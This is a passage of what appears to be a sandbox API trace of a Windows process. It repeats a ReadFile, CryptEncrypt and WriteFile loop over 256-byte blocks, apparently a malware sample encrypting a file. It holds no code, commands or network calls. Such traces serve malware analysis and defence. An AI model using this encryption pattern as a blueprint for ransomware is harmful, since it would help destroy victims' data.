hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.407] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.407] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.407] GetLastError () returned 0x0 [0144.407] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.408] GetLastError () returned 0x0 [0144.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.408] GetLastError () returned 0x0 [0144.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.408] GetLastError () returned 0x0 [0144.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.408] GetLastError () returned 0x0 [0144.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.408] GetLastError () returned 0x0 [0144.408] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.408] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.408] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.409] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.409] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.409] GetLastError () returned 0x0 [0144.409] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.410] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.410] GetLastError () returned 0x0 [0144.410] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.410] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.411] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.411] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.411] GetLastError () returned 0x0 [0144.411] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.412] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.412] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.412] GetLastError () returned 0x0 [0144.412] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, 